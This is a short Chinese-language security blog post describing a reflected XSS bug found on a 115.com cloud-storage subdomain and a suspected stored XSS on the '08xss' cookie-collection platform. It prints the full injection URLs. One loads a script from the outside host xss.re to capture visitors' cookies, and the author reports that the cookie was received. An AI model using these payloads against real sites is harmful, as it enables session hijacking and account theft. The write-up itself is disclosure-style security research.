Author:Mosuan

Team:安全盒子(www.secbox.cn

Weibo:http://weibo.com/secbox

 

记一次对115分站简单绕过过滤继续实现xss,08xss平台也中枪!!

115反射型xss url:http://115.qiye.115.com/disk/?ac=select_public_file&ajax=1&pub=

http://115.qiye.115.com/disk/?ac=select_public_file&ajax=1&pub=<script>alert(/xss/)</script>

插入这个代码看

没弹窗我们看看源代码

记一次挖掘115网盘反射型xss,08xss的储存型xss-安全盒子

在这里小伙伴们想到了什么?再来插入一次xss?对的,就是这样!!

记一次挖掘115网盘反射型xss,08xss的储存型xss-安全盒子

看看源代码

记一次挖掘115网盘反射型xss,08xss的储存型xss-安全盒子

===============08开始躺枪=========================

我前些天在08xss平台注册了个账号正好测试下能不能接收cookie

把url换成

http://115.qiye.115.com/disk/?ac=select_public_file&ajax=1&pub=<script>alert(/xss/)</script><scriptsrc=http://xss.re/xxx></script>;

记一次挖掘115网盘反射型xss,08xss的储存型xss-安全盒子看看源代码吧!记一次挖掘115网盘反射型xss,08xss的储存型xss-安全盒子

入库就对了!!哇哈哈!!~~

 

下面属于我的想象

 

08平台这个xss能不能利用呢?

 

我想到几点,首先这个平台的项目都是有顺序的,在某网站插入代码

www.xx.com/info.php?id=<script src=http://xss.re/别人的项目代码></script>

<script src=http://xss.re/我的项目代码></script>

也就是说先执行别人的代码然后别人查看这个项目就中招了。

 

这是我的想象,具体的没怎么测试,这个有待挖掘,这个项目是顺序的,我的是1,下一个别人创建的就是2了,这样利用起来方便,就是不知道能不能执行成功。

==============================================

上面是去年写的

下面是我刚刚猜想的,

既然代码是可以执行的,也就是说插入别人的代码在前面就先弹别人的?

插入http://www.baidu.com/info.php?id=<script scr=08xss.re/13></script><script scr=08xss.re/14></script>

是先执行别人的,但是在08xss平台里面,你先执行别人的代码有用吗?

你执行完之后是不是你的cookie发到别人的xss平台里面?

所以说得先让别人查看他的项目然后劫持到他的coookie,这个也不好利用

具体的你们自己测试吧,我懒得看这种。想多了头疼